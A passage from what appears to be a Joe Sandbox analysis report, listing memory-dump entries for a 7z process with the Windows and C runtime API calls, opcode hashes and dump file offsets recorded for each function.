                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memmove$ExceptionThrowfreemalloc
                                                                • String ID:
                                                                • API String ID: 1415420288-0
                                                                • Opcode ID: 17819045fa4f71224e77d6b47d31bebb38c9a9f9600a532a75b3572cd8e30e53
                                                                • Instruction ID: 81f2190c0aeffe194711606f726370f6f2a089e695996318a77aee7ef78a58a0
                                                                • Opcode Fuzzy Hash: 17819045fa4f71224e77d6b47d31bebb38c9a9f9600a532a75b3572cd8e30e53
                                                                • Instruction Fuzzy Hash: 9611A2A23056C592CA35EB55F0953EEA310F7A1790F804436DBAD47AA9DF38D6CACB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                • Instruction ID: 56a27e95cc9a7b3d95fec9599324aca932165fc211486b808a29805b76ddade4
                                                                • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                • Instruction Fuzzy Hash: 36F08C23302B94C6DA24AA26E8402AD7720AB96FB1F188330EF7917B91CF64C857C300
                                                                APIs
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                • memmove.MSVCRT ref: 0015C815
                                                                • free.MSVCRT ref: 0015C81D
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrowfreemallocmemmove
                                                                • String ID:
                                                                • API String ID: 1097815484-0
                                                                • Opcode ID: 81a948d7c8275a5e02843b536d61aee36f4bb894a1cd073c72687d460436fb1b
                                                                • Instruction ID: 3e4e554969f21a175273eb104fb24c86a56b9647befa8f776ae5fba9fb6c942a
                                                                • Opcode Fuzzy Hash: 81a948d7c8275a5e02843b536d61aee36f4bb894a1cd073c72687d460436fb1b
                                                                • Instruction Fuzzy Hash: A3018177701688CBCB18DF26D46156CB765E389F99B08C129DF154B358CB34DC9ACB90
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32 ref: 00150A42
                                                                • LeaveCriticalSection.KERNEL32 ref: 00150A73
                                                                  • Part of subcall function 0015B480: GetTickCount.KERNEL32 ref: 0015B49E
                                                                  • Part of subcall function 0015B480: strcmp.MSVCRT ref: 0015B4E3
                                                                  • Part of subcall function 0015B480: wcscmp.MSVCRT ref: 0015B502
                                                                  • Part of subcall function 0015B480: strcmp.MSVCRT ref: 0015B568
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                • String ID:
                                                                • API String ID: 3267814326-0
                                                                • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                • Instruction ID: bed335098c6dc07801198c41b2fd78e16e24fd9810ffe0d711074e7ef5c977e1
                                                                • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                • Instruction Fuzzy Hash: FBF05E72214B5082E7219B24EC847996370E789BB6F144338EE7D4B6E4CF38858AC354
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                • Instruction ID: 28192782aa022feddf7be36b73321207ea39bb22f1ae1880e87b11067d14eadd
                                                                • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                • Instruction Fuzzy Hash: E0E0376225894051CA24EB20E4510DA6720E7E67F4B482331F6BF57AF9DF38C6D5CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrowmalloc
                                                                • String ID:
                                                                • API String ID: 2436765578-0
                                                                • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                • Instruction ID: 1cf36970b7fc3da7417d7cb04a3d54224a4515250228a53d2c57fde376b39031
                                                                • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                • Instruction Fuzzy Hash: 70D02260B1B680E0DE08AB10A8813881720BBE8341FC01055F20E02324DB2CC18FCB00
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                • Instruction ID: baeac43a24352919f355c22df736ec1a6b78c748ac37786771faec89c0303835
                                                                • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                • Instruction Fuzzy Hash: DE514673248AD0A6CB32CF25E4406ED3B61F399F98F694136DE9A4A719DF34C8A1C710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ByteString
                                                                • String ID:
                                                                • API String ID: 4236320881-0
                                                                • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                • Instruction ID: 3d24560817cebff33a97a69c9425ebadb2d24d9908570ffcda83bbf7720f8c9b
                                                                • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                • Instruction Fuzzy Hash: CE11822621878182E3709B18A4407BA7661E7847A4F644321FFDA577E4EF3CCD85C705
                                                                APIs
                                                                  • Part of subcall function 00118A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00118E1D), ref: 00118A99
                                                                  • Part of subcall function 00118A60: GetLastError.KERNEL32(?,?,00000003,?,00118E1D), ref: 00118AA6
                                                                • SetEndOfFile.KERNELBASE ref: 00118CC7
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: File$ErrorLastPointer
                                                                • String ID:
                                                                • API String ID: 841452515-0
                                                                • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                • Instruction ID: e32f507570a9180f13f0ecfe51f38beaa99f258155084d38238bf81d056406de
                                                                • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                • Instruction Fuzzy Hash: 8AE02612301894C3E7289FB1A8817EA9310AB857E0F48C031AA4543B488F658CDA8710
                                                                APIs
                                                                  • Part of subcall function 00116464: FreeLibrary.KERNELBASE(?,?,?,001164E7), ref: 00116475
                                                                • LoadLibraryExW.KERNELBASE ref: 001164F4
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: Library$FreeLoad
                                                                • String ID:
                                                                • API String ID: 534179979-0
                                                                • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                • Instruction ID: c11140721ccc472e9c3c21792e3135b9061cbe3d51e55aa3374c214db705796d
                                                                • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                • Instruction Fuzzy Hash: DBD02E21701A20C2EE182BBAA8813E903022F06BE2F88C0309E0903701DF2A0CEBA300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                • Instruction ID: d063e24c478c94281d9f79ee62210cbacd97221f6d87a5191525a288fc2a6772
                                                                • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                • Instruction Fuzzy Hash: 84E04F76214640CBE740CF60E40074AB3A0F388714F000114DE8D83B54CBBCC045CF40
                                                                APIs
                                                                • FreeLibrary.KERNELBASE(?,?,?,001164E7), ref: 00116475
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                • Instruction ID: 6ce59ecd7bb929a0753a932c433550d9138059e36c7ca41d001eab55ddec63e2
                                                                • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                • Instruction Fuzzy Hash: F5D012A2702904C5FF194FF2EC543B523586B58F45F5C5024CE154B640EB2A88D6C760
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                • Instruction ID: 1a77705a44a577c57b9d52c24b5c9005b52495e98f1fb812e3265d9b2c90ad69
                                                                • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                • Instruction Fuzzy Hash: BFD01776614A84C6E7008F70E44579AF764F388B65F480008EA8807764CBBCC19ACB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs
                                                                • String ID:
                                                                • API String ID: 1795875747-0
                                                                • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                • Instruction ID: 1382490079c4a32fed659901f28253d43b43135a91994ca657e0e46bdcdff7cd
                                                                • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                • Instruction Fuzzy Hash: 7AD0A7D1700B4D81DE109B26D8002A96321B798BC8F044031DE9D0B314EA2CC145CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CloseFind
                                                                • String ID:
                                                                • API String ID: 1863332320-0
                                                                • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                • Instruction ID: 04e4f9d0a1e48184fd634b74cd51685b2524cde1982c483331fc4910841b5ccd
                                                                • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                • Instruction Fuzzy Hash: E9D0C7B5609D4581DB251F7998403A413629B94F75F584320D9B4497E0DF2584D6C711
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: FileTime
                                                                • String ID:
                                                                • API String ID: 1425588814-0
                                                                • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                • Instruction ID: 6676b4b3b17cf899f9f2b8a7db98826aeb113c536c91c784a755738c23f409fd
                                                                • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                • Instruction Fuzzy Hash: BAB09230B12800C6CB0C6B22DCD231D13606788B22FE14429C60BD9650CD1C85EA4700
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 00143E2A
                                                                  • Part of subcall function 00112130: malloc.MSVCRT ref: 00112134
                                                                  • Part of subcall function 00112130: _CxxThrowException.MSVCRT ref: 0011214F
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorExceptionLastThrowmalloc
                                                                • String ID:
                                                                • API String ID: 2114622545-0
                                                                • Opcode ID: ac085397a568cd8d14ceeec2df6ba23388e6ed1d835e247545a2bb9031c05b64
                                                                • Instruction ID: 355408d79f8f2f37c34e9d15a4d83b948a8b5758697b16faab371397027971f6
                                                                • Opcode Fuzzy Hash: ac085397a568cd8d14ceeec2df6ba23388e6ed1d835e247545a2bb9031c05b64
                                                                • Instruction Fuzzy Hash: F031AC32602B4086DB199F69E5943A9B3A1FB98FE0F594534DF6A07764EF38C996C300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                • Instruction ID: fb9ca0c363eb1b8e629c3feb7a2d4ff2c5f0cb81f9b92a5617dae14a5ee8b637
                                                                • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                • Instruction Fuzzy Hash: 9D213AB370425097C728DB1AB80055A7794F759BB4F246334FE7A87784EB78C942C744
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast
                                                                • String ID:
                                                                • API String ID: 1452528299-0
                                                                • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                • Instruction ID: c55dc3baa1b39f5daaf17689ba25a86ca21727ed9e99fe3f1ba21645f151bbdf
                                                                • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                • Instruction Fuzzy Hash: 3C113D627D565C87CB3C8B6CE4507E4B250F75078DB949036DACA8B610DB69CCC2D2C1
                                                                APIs
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341B9
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341C5
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341D1
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341DD
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341E6
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341EF
                                                                  • Part of subcall function 0013419C: free.MSVCRT ref: 001341F8
                                                                • free.MSVCRT ref: 00143F45
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                • Instruction ID: cadbfdeb37e159f095061a79063041570a7ef1ee411f6b011919f10e351c4311
                                                                • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                • Instruction Fuzzy Hash: C0014C73A20790CAC7219F1DC18116DBB24F769FE83689216EB5907770E732C887C7A1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                • Instruction ID: 3836e65883b1c5cbc16f05290607d0470c5c6da37647d5febbd474b960e3df09
                                                                • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                • Instruction Fuzzy Hash: C7016D7631624086E710CF15C56C3AE7BB0B7E5B68F180218DBA44B3D1C7BAC58ACBA4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast
                                                                • String ID:
                                                                • API String ID: 1452528299-0
                                                                • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
